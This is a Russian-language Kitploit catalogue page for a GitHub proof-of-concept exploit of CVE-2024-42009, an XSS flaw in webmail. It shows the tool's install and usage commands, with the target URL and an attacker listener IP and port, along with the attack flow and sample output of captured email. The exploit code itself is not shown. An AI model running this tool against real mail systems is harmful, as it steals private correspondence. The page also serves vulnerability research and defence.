Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-42009 — Этот Proof of Concept (PoC) демонстрирует эксплойт для CVE-2024-42009, использующий уязвимость межсайтового скриптинга (XSS) для извлечения электронных писем из целевого веб-почтового приложения. Атака внедряет вредоносную полезную нагрузку, которая выводит содержимое писем на прослушиватель, контролируемый злоумышленником. | Kitploit
Инструменты/GitHubGitHub/bhanunamikaze/cve-2024-42009
Инструменты фишингаРазведкаГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот Proof of Concept (PoC) демонстрирует эксплойт для CVE-2024-42009, использующий уязвимость межсайтового скриптинга (XSS) для извлечения электронных писем из целевого веб-почтового приложения. Атака внедряет вредоносную полезную нагрузку, которая выводит содержимое писем на прослушиватель, контролируемый злоумышленником.

GitHub
bhanunamikaze/cve-2024-42009

CVE-2024-42009

Репозиторий
171 год назадЕщё не проверено
Поделиться

CVE-2024-42009 PoC: Демонстрация перехвата писем и XSS-эксплойт

Обзор

Этот Proof of Concept (PoC) демонстрирует эксплойт для CVE-2024-42009, использующий уязвимость межсайтового скриптинга (XSS) для извлечения писем из целевого веб-почтового приложения. Атака внедряет вредоносную нагрузку, которая экфильтрует содержимое писем на подконтрольный злоумышленнику слушатель.

Возможности

  • Использует XSS-уязвимость для захвата содержимого писем.
  • Применяет HTTP-слушатель для приема и декодирования экфильтрованных писем.
  • Автоматизирует внедрение полезной нагрузки и экфильтрацию.

Требования

  • Python 3.x
  • Необходимые зависимости (установка через pip):
    root@kitploit:~
    pip install requests beautifulsoup4
    

Использование

Запустите скрипт с необходимыми аргументами:

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

Параметры

Порядок атаки

  1. Запуск слушателя: Скрипт запускает HTTP-сервер для захвата извлеченных писем.
  2. Внедрение вредоносной нагрузки: XSS-полезная нагрузка отправляется через специально сформированное письмо.
  3. Запуск выполнения: Когда жертва открывает письмо, нагрузка выполняется и отправляет содержимое письма на сервер атакующего.
  4. Захват и декодирование: Извлеченное содержимое письма декодируется и отображается.

Пример вывода

root@kitploit:~
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!

Отказ от ответственности

Я не претендую на авторство, владение или раскрытие этой уязвимости и всех соответствующих эксплойтов, размещенных в этом репозитории GitHub — все заслуги принадлежат исследователю, который ее обнаружил; я всего лишь создал POC для воспроизведения уязвимости на основе данных из интернета. Этот PoC предназначен только для образовательных и исследовательских целей. Несанкционированное тестирование систем без согласия незаконно. Используйте ответственно!

Скачать инструмент
АргументОписание
-fu, --from-userАдрес электронной почты отправителя
-tu, --to-userАдрес электронной почты получателя
-u, --target-urlURL целевой веб-почты
-ip, --server-ipIP-адрес слушателя атакующего
-p, --server-portПорт слушателя (по умолчанию: 1337)